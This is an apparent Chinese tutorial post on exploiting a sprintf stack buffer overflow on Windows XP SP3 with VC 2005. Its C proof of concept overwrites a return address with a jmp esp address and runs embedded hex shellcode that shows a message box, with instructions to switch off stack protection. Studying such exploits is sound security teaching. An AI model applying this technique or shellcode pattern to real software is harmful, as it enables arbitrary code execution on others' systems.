Sprintf缓冲区溢出.
这段代码的shellcode是抄的别人的,仅仅显示出一个msgbox提醒一下。
编译器为 vc 2005
操作系统为 xp sp3
如果你的编译器或者操作系统不完全相同,有可能溢出失败
大概原理为:
执行sprintf时,将我们构造的长字符串拷贝到堆栈区,从而覆盖了fun函数的返回地址(字符串16字节处),而此时esp正好指向字符串20字节处,因此我们将16处覆盖为jmp esp指令的地址, 将20字节处覆盖为我们的shell code。当函数fun返回时,正好将jmp esp的地址出栈,而执行了jmp esp后,正好执行到20字节处的shell code。
1
#include <stdio.h>
2
#include <string.h>
3
4
/***********************************************************************
5
please disable 缓冲区安全检查:
6
c/c++ -> 代码生成 -> 缓冲区安全检查=否(/GS-)
7
please disable 优化:
8
c/c++ -> 优化 ->优化=禁用(/Od)
9
************************************************************************/
10
void fun(const char* input)
11
12
{
13
14
char buf[10];
15
//_asm int 3;
16
printf("My stack look like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
17
sprintf(buf,"%s",input);//这里会造成溢出
18
19
printf("%s\n",buf);
20
//_asm int 3;
21
22
printf("New stack look like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
23
/*_asm
24
{
25
mov ecx,dword ptr [ebp-4] ;
26
xor ecx,ebp;
27
mov eax,0x403000;
28
mov [eax],ecx;
29
}*/
30
}
31
32
33
char failwest_popup[]=
34
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
35
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
36
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
37
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
38
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
39
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
40
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
41
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
42
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
43
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
44
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8";
45
46
int main(int argc, char* argv[])
47
48
{
49
50
printf("address of foo=%p\n",fun);
51
52
#define N 1000
53
char ss[N];//="AAAAAAAAAA";
54
55
for (int i=0;i<N;i++)
56
{
57
ss[i]='0'+i/10;
58
}
59
/*int p=16;
60
ss[p++]='2';
61
ss[p++]='2';
62
ss[p++]='2';
63
ss[p++]='2';
64
int p2=20;
65
ss[p2++]='3';
66
ss[p2++]='3';
67
ss[p2++]='3';
68
ss[p2++]='3';
69
ss[N-1]=0;*/
70
strcpy(ss+16, "\x12\x45\xfa\x7f"); //JMP ESP
71
strcpy(ss+20, failwest_popup);
72
73
fun(ss);
74
75
return 0;
76
77
}
78
79
编译器为 vc 2005
操作系统为 xp sp3
如果你的编译器或者操作系统不完全相同,有可能溢出失败
大概原理为:
执行sprintf时,将我们构造的长字符串拷贝到堆栈区,从而覆盖了fun函数的返回地址(字符串16字节处),而此时esp正好指向字符串20字节处,因此我们将16处覆盖为jmp esp指令的地址, 将20字节处覆盖为我们的shell code。当函数fun返回时,正好将jmp esp的地址出栈,而执行了jmp esp后,正好执行到20字节处的shell code。
1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79
